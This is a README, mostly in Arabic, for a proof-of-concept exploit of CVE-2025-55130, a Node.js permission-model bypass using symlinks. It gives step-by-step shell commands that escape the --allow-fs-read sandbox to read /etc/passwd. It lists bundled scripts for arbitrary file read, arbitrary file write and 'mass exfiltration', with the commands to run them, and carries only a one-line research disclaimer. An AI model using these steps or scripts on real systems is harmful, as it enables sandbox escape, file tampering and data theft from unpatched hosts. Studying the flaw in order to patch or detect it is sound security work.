
POC لـ CVE-2025-55130
___ _ _ ___ ____ ___ ____ ____ ____ ____ _ _____ ___
/ __| | | | __|___/ _ \ / _ \___ \| ___| | ___| ___/ |___ // _ \
| (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
\___|\___/|___| \__ ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
|___/ |____/____/|_|____/\___/
Node.js Permission Model Bypass via Crafted Symlinks
[ Discovered by natann @ JFrog ]
ثغرة في اجتياز المسار داخل Node.js تتيح تجاوز قيود الصلاحيات --allow-fs-read و--allow-fs-write
باستخدام روابط رمزية (symlinks) تشير إلى مسارات مطلقة مقترنة باجتياز نسبي.
يتم تنفيذ فحص الصلاحيات وحلّ المسار بشكل منفصل. بمجرد اجتياز المسار الأولي لفحص الصلاحيات، يتم تتبّع الرابط الرمزي وتقوم تسلسلات الاجتياز بالهروب من بيئة العزل (sandbox).
| الفرع | الإصدار المتأثر | الإصدار المُصلَّح |
|---|---|---|
| 20.x | < 20.20.0 | 20.20.0 |
| 22.x | < 22.22.0 | 22.22.0 |
| 24.x | < 24.13.0 | 24.13.0 |
| 25.x | < 25.3.0 | 25.3.0 |
Permission Check: ./nested/dirs/symlink/../../../etc/passwd
^^^^^^^^^^^^^^^^^^ ALLOWED (starts with ./)
Path Resolution: /actual/path/to/script/../../../etc/passwd
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Resolves to /etc/passwd - OUTSIDE SANDBOX
يقوم نموذج الصلاحيات بالتحقق من سلسلة المسار قبل حلّ الرابط الرمزي. من خلال إنشاء رابط رمزي
يشير إلى مسار مطلق واستخدام اجتياز ../ بعد الرابط الرمزي، يمكن الهروب من الدليل المسموح به.
1. mkdir -p ./a/b/c/d/e/f/g # Create nested dirs in allowed path
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x # Symlink to absolute path
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
^^^^^^^^^^^^^^^^^
Permission check passes (inside ./)
After symlink resolution:
/home/user/project/../../../etc/passwd -> /etc/passwd
^^^^^^^^^^^^^^^^^^^^
Traversal escapes to root
| الملف | الغرض |
|---|---|
exploit.js | الاستغلال الرئيسي - قراءة ملفات عشوائية |
exploit_write.js | كتابة ملفات عشوائية |
exfil.js | استخراج جماعي للملفات |
check.js | التحقق من قابلية الإصدار للإصابة بالثغرة |
# Basic exploitation
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js
# Check if vulnerable
node check.js
# Mass exfil
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js
لأغراض البحث والاختبار المصرح به فقط.